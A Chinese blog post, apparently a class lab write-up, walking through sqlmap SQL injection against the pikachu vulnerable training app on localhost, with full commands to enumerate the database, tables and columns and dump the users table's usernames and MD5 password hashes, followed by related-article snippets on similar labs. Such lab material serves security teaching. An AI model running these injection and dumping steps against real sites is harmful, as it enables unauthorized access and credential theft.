实验20:sqlmap工具使用入门及案例介绍

最新推荐文章于 2024-06-16 14:24:27 发布
最新推荐文章于 2024-06-16 14:24:27 发布
阅读量234 收藏 1
点赞数
分类专栏: 作业
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44720671/article/details/89308730
版权

sqlmap工具使用入门

我之前写过一篇sqlmap的基本入门,那个是以墨者学院的靶场为例,这里我们用pikachu重新演示一下。
打开sqlmap和pikachu的字符型注入。
在这里插入图片描述
在这里插入图片描述
在pikachu的输入框中随意输入数字,使其出现注入点
在这里插入图片描述
在sqlmap中输入python sqlmap.py -u “http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=111&submit=查询” --current-db
·引号内的是有注入点的网址,‘–current-db’是获取数据库名
【注:千万不要多空格或者少空格,否则不识别】
在这里插入图片描述
这样我们就获得了数据库名,然后利用数据库名,获取表名
输入:python sqlmap.py -u “http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=111&submit=查询” -D pikachu --tables
在这里插入图片描述
一般在数据库中,用户名默认为“users”,因此我们利用users获取列名
输入:python SQLMAP.py -u “http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=111&submit=查询” -D pikachu -T users --columns
在这里插入图片描述
然后我们利用‘username’和‘password’获取用户名和密码
由于这里的表和列都挺少,我们可以直接将列中的内容输出:
输入:python SQLMAP.py -u “http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=111&submit=查询” -D pikachu -T users --dump
在这里插入图片描述这里的密码处于md5加密模式,我们只需要上网使用md5解密工具即可获取密码
在这里插入图片描述

以菜之名
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了一些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
Sqlmap 实验
wangjingder803的博客
03-17 176
点击文件在这里打开终端,输入sqlmap -r 1.txt --data=id --batch(-r参数是指定一个文件,-data是指定我们要进行sql注入的参数,-batch意思是选择默认参数)使用sqlmap -r 123.txt --data=id --batch -D dvwa -T users –dump语句能查看所有users表中内容。#创建一个1.txt文件,将获取的数据复制进去(在本机创建后复制到虚拟机内)获得user表,再通过下面命令列出dvwa数据库下,users表中的列名。
使用Sqlmap进行sql注入(pikachu字符型注入为例)
最新发布
weixin_48118301的博客
06-16 468
sql注入
Sqlmap实验
ch258563的博客
03-17 106
Sqlmap实验
渗透测试——SQL注入实验Sqlmap
YT的博客
02-11 6368
实验环境 本实验中,OWASP Web服务器靶机(10.10.10.129,对外公开域名:www.dvssc.com)含有 SQL注入漏洞,在攻击机 BT5 R1 (10.10.10.128)上通过工具进行攻击。 工具sqlmap、Firefox浏览器内置的 Tamper Data 1. 输入 www.dvssc.com (或10.10.10.129) 登录要攻击的网站,点击登录界面 2....
信息系统安全实验SQLMap工具使用综合实验
7xun's space
04-18 548
切换到PC1的命令行的相应目录下,输入“python sqlmap.py -u "http:// 192.168.161.135/ry.php?ry_id=1"”,其中“-u”参数用于指定注入点的URL。(2)根据SQL注入的原理,可以得到一种防范方法,就是对构成网站的目录中(在实验中该目录为C:/code/sql)的相关php文件(比如ry.php)进行修改,这样可以使得SQLMap无法检测到注入点。(1)在本次实验中,我注意到:注入点已经提前给出,而如果注入点没有给出的话,就需要我们手动寻找注入点。
Web应用安全:Sqlmap用法介绍实验).docx
06-20
Sqlmap介绍Sqlmap是一款强大的自动化SQL注入工具,用于检测和利用SQL注入漏洞。它可以帮助安全研究人员或渗透测试人员快速识别和利用Web应用程序中的SQL注入弱点,从而提高安全性评估的效率。Sqlmap的主要功能...
Web应用安全:Sqlmap操作参数介绍.pptx
06-19
Sqlmap是一款功能强大的开源渗透测试工具,专门用于检测和利用SQL注入漏洞,它可以自动化地发现并利用这些漏洞来访问数据库服务器。Sqlmap的亮点在于其强大的检测引擎和各种特性的渗透测试器,允许通过数据库指纹...
安全测试工具sqlmap,很好用的sql注入测试工具
10-29
使用sqlmap时,首先需要安装这个工具,可以从其GitHub仓库下载最新版本,如压缩包中的"sqlmapproject-sqlmap-e2f48a9"。安装完成后,通过命令行输入`sqlmap -h`可以查看帮助信息,了解基本用法。然后,可以使用`...
Web应用安全:Sqlmap用法介绍.pptx
06-20
本文将重点介绍如何利用Sqlmap工具进行SQL注入攻击的演示,以及如何搭建测试环境。 Sqlmap是一种自动化工具,专门用于检测和利用SQL注入漏洞。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过向网页输入...
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
初学sqlmap 实验吧wp
Daniel的博客
06-30 477
初次接触sqlmap。 首先判断是否存在注入点,先在网址后加'。 然后 可以判断存在注入点。然后就可以使用sqlmap。首先查看当前数据库。 发现数据库名为my_db;然后爆表名。 继续爆thiskey表的列。 接着爆 拿到key。
神器SQLmap实战详解
Sgirll的博客
04-07 483
本文将以SQLMap工具为核心,深入探讨SQL注入的原理、检测、利用及防御策略,旨在为网络安全研究人员、渗透测试人员提供实用指南。通过学习和使用SQLMap这样的工具,我们不仅能够更好地理解SQL注入的原理和攻击手法,还能够加强我们的应用程序和数据库的安全防护。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。SQLMap是一款开源的自动化SQL注入测试工具,它能够检测和利用Web应用中的SQL注入漏洞。
渗透测试-SQL注入之sqlmap使用方法及实战案例
lza20001103的博客
07-19 3829
渗透测试-SQL注入之sqlmap使用方法及实战案例
sqlmap工具使用实验流程回顾
安久哲的博客
09-24 128
没有cookie认证可以直接使用sqlmap,进行注入 sqlmap -u "https......"
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 1915
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
通过SqlMap对pikachu平台进行注入
weixin_52347768的博客
11-24 2011
课上学习笔记
通过sqlmap对pikachu平台进行注入
Ma79328的博客
12-28 1848
通过sqlmap对pikachu平台进行注入 1.基于布尔的盲注 2.复制url 3.打开kali的终端,使用sqlmap进行注入测试,使用命令sqlmap -u “进行注入的URL” --current-db -batch列出当前的数据库,并自动选择YES 4.得到当前数据库名为pikachu 5.使用命令sqlmap -u “进行注入的URL” -D pikachu -tables -batch,用已知pikachu数据库名加-tables列出当前的表 6. 得到该数据库的所有表单 7.使用
皮卡丘(pikachu)SQL注入(手工和工具举例)
weixin_44787832的博客
07-21 4169
我们以数字型(使用sqlmap)和整数型(使用手工注入)举一个例子 数字型注入(POST) 我们使用sqlmap 选择1点击查询并抓包 将抓下来的数据全部复制在一个记事本里,命名为1.txt 使用命令 python sqlmap.py –r 111.txt –current-db 爆出数据库:pikachu 之后爆破表:python sqlmap.py –r 111.txt –D pikachu -tables 爆出表 在之后找一个表去爆列名 python
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值